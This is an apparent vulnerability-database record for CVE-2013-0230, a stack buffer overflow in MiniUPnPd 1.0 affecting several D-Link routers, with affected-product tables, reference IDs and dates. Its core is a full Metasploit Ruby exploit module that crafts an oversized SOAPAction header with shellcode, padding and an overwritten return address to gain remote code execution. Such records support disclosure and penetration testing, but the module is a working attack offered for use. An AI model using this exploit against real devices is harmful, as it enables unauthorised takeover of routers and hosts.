ID
VAR-E-201301-0050
CVE
cve_id: | CVE-2013-0230 | Trust: 3.4 |
cve_id: | CVE-2013-0229 | Trust: 1.4 |
EDB ID
25975
TITLE
MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit) - Linux remote Exploit
Trust: 0.6
DESCRIPTION
MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit). CVE-2013-0230, CVE-89624. Remote exploit for the Linux platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | miniupnpd | model: | - | scope: | eq | version: | 1.0 | Trust: 2.1 |
vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.4 | Trust: 0.6 |
vendor: | infomark | model: | imw-c920w miniupnpd | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | miniupnpd | model: | remote | scope: | eq | version: | 1.0 | Trust: 0.5 |
vendor: | miniupnpd | model: | stack buffer overflow | scope: | eq | version: | 1.0 | Trust: 0.5 |
vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | d link | model: | dir-836l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | d link | model: | dir-826l 1.04b05 | scope: | - | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-636l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | d link | model: | dir-626l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.3 | Trust: 0.3 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.1 | Trust: 0.3 |
vendor: | d link | model: | dir-836l 1.04b09 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-826l 1.05b06 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-636l 1.05b07 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-626l 1.04b04 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
      'Description'    => %q{
        This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
        present in the SOAPAction HTTP header handling.
      },
      'Author'         =>
        [
          'hdm',         # Vulnerability discovery
          'Dejan Lukan'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'EXITFUNC' => 'process', },
      # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
      # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
      # of the program is never reached)
      'Payload'        =>
        {
          'Space'       => 2060,
          'BadChars'    => "\x00\x22",
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2013-0230' ],
          [ 'OSVDB', '89624' ],
          [ 'BID', '57608' ],
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]
        ],
      'Targets'        =>
        [
          [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
            {
              'Ret'    => 0x0804ee43, # pop ebp # ret # from miniupnpd
              'Offset' => 2123
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 27 2013',
    ))

    register_options([
      Opt::RPORT(5555),
    ], self.class)
  end

  def exploit
    #
    # Build the SOAP Exploit
    #

    # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
    sploit = "\xeb\x2d"
    # a valid action
    sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
    # payload
    sploit += payload.encoded
    # nops
    sploit += rand_text(target['Offset'] - sploit.length - 16)
    # overwrite registers on stack: the values are not used, so we can overwrite them with anything
    sploit += rand_text(4) # overwrite EBX
    sploit += rand_text(4) # overwrite ESI
    sploit += rand_text(4) # overwrite EDI
    sploit += rand_text(4) # overwrite EBP
    # Overwrite EIP with the address of "pop ebp, ret", because the second value on the
    # stack points directly to the string after 'Soapaction: ', which is why we must
    # throw the first value on the stack away, which we're doing with the pop ebp
    # instruction. Then we're returning to the next value on the stack, which is
    # exactly the address that we want.
    sploit += [target.ret].pack('V')
    # the ending " character is necessary for the vulnerability to be reached
    sploit += "\""

    # data sent in the POST body
    data =
      "<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
      "<SOAP-ENV:Envelope\r\n" +
      " SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      " xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      " xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
      ">\r\n" +
      "<SOAP-ENV:Body>\r\n" +
      "<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
      "</ns1:action>\r\n" +
      "</SOAP-ENV:Body>\r\n" +
      "</SOAP-ENV:Envelope>\r\n"

    #
    # Build and send the HTTP request
    #
    print_status("Sending exploit to victim #{target.name} at ...")
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/",
      'headers' => {
        'SOAPAction' => sploit,
      },
      'data'    => data,
    })

    # disconnect from the server
    disconnect
  end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Stack Buffer Overflow Remote Code Execution (Metasploit)
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.5 |
tag: | remote | Trust: 1.0 |
tag: | overflow | Trust: 1.0 |
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | shell | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | web | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2013-0230 | Trust: 4.0 |
db: | EXPLOIT-DB | id: | 25975 | Trust: 1.6 |
db: | NVD | id: | CVE-2013-0229 | Trust: 1.4 |
db: | EDBNET | id: | 47971 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 23837 | Trust: 0.6 |
db: | EDBNET | id: | 23462 | Trust: 0.6 |
db: | PACKETSTORM | id: | 131651 | Trust: 0.5 |
db: | PACKETSTORM | id: | 132599 | Trust: 0.5 |
db: | PACKETSTORM | id: | 121873 | Trust: 0.5 |
db: | CERT/CC | id: | VU#922681 | Trust: 0.3 |
db: | BID | id: | 57607 | Trust: 0.3 |
db: | BID | id: | 57608 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2013-0230 | Trust: 3.1 |
url: | https://nvd.nist.gov/vuln/detail/cve-2013-0229 | Trust: 1.1 |
url: | https://www.exploit-db.com/exploits/25975/ | Trust: 0.6 |
url: | https://0day.today/exploits/23837 | Trust: 0.6 |
url: | https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/922681 | Trust: 0.3 |
url: | http://miniupnp.free.fr/ | Trust: 0.3 |
url: | https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf | Trust: 0.3 |
SOURCES
db: | BID | id: | 57607 |
db: | BID | id: | 57608 |
db: | PACKETSTORM | id: | 131651 |
db: | PACKETSTORM | id: | 132599 |
db: | PACKETSTORM | id: | 121873 |
db: | EXPLOIT-DB | id: | 25975 |
db: | EDBNET | id: | 47971 |
db: | EDBNET | id: | 23462 |
LAST UPDATE DATE
2022-07-27T09:12:10.250000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
db: | BID | id: | 57608 | date: | 2015-05-12T19:46:00 |
SOURCES RELEASE DATE
db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
db: | BID | id: | 57608 | date: | 2013-01-28T00:00:00 |
db: | PACKETSTORM | id: | 131651 | date: | 2015-04-27T15:55:55 |
db: | PACKETSTORM | id: | 132599 | date: | 2015-07-08T00:53:09 |
db: | PACKETSTORM | id: | 121873 | date: | 2013-06-05T00:50:31 |
db: | EXPLOIT-DB | id: | 25975 | date: | 2013-06-05T00:00:00 |
db: | EDBNET | id: | 47971 | date: | 2013-06-05T00:00:00 |
db: | EDBNET | id: | 23462 | date: | 2015-07-08T00:00:00 |